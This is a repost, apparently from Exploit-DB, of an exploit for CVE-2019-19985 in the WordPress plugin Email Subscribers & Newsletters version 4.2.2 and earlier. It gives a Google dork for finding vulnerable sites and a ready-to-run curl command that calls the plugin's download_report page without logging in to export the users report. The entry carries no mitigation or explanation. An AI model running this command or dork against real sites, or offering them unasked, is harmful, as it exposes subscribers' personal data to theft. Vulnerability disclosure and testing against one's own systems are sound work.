WordPress Plugin Email Subscribers & Newsletters 4.2.2 – Unauthenticated File Download - 体验盒子

作者： KBA@SOGETI_ESEC

日期： 2020-07-26

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/48698/

# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
# Date: 2020-07-20
# Exploit Author: KBA@SOGETI_ESEC
# Vendor Homepage: https://www.icegram.com/email-subscribers/
# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
# Version: <= 4.2.2
# Tested on: Email Subscribers & Newsletters 4.2.2
# CVE : CVE-2019-19985

 ################################################################################################
 # ___ ___ ___ ______ #
 #/\\ /\\ /\\ /\\/\\___ #
 # /::\\ /::\\ /::\\ /::\\ \:\\/\\#
 #/:/\ \\ /:/\:\\ /:/\:\\ /:/\:\\ \:\\ \:\\ #
 # _\:\~\ \\ /:/\:\\ /:/\:\\ /::\~\:\\/::\\/::\__\#
 #/\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/#
 #\:\ \:\ \/__\:\\ /:/\:\/\ \/__\:\~\:\ \/__/:/\/__/\/:// #
 # \:\ \:\__\\:\/:// \:\ \:\__\\:\ \:\__\/://\::/__/#
 #\:\/:// \:\/:// \:\/:// \:\ \/__/\/__/\:\__\#
 # \::// \::// \::// \:\__\\/__/#
 #\/__/ \/__/ \/__/ \/__/ #
 # ___ ___ ___ ___#
 #/\\ /\\ /\\ /\\ #
 # /::\\ /::\\ /::\\ /::\\#
 #EXPLOIT /:/\:\\ /:/\ \\ /:/\:\\ /:/\:\\ #
 # Email Subscribers & Newsletters <= 4.2.2/::\~\:\\ _\:\~\ \\ /::\~\:\\ /:/\:\\#
 # Unauthenticated File Download/:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ #
 #\:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\\\/__/ #
 # \:\ \:\__\\:\ \:\__\\:\ \:\__\\:\\ #
 #\:\ \/__/ \:\/:// \:\ \/__/ \:\\#
 # \:\__\\::// \:\__\\:\__\ #
 #KBAZ\/__/ \/__/ \/__/ \/__/ #
 ##
 ##
 ################################################################################################


curl [BASE_URL]'/wp-admin/admin.php?page=download_report&report=users&status=all'
EXAMPLE: curl 'http://127.0.0.1/wp-admin/admin.php?page=download_report&report=users&status=all'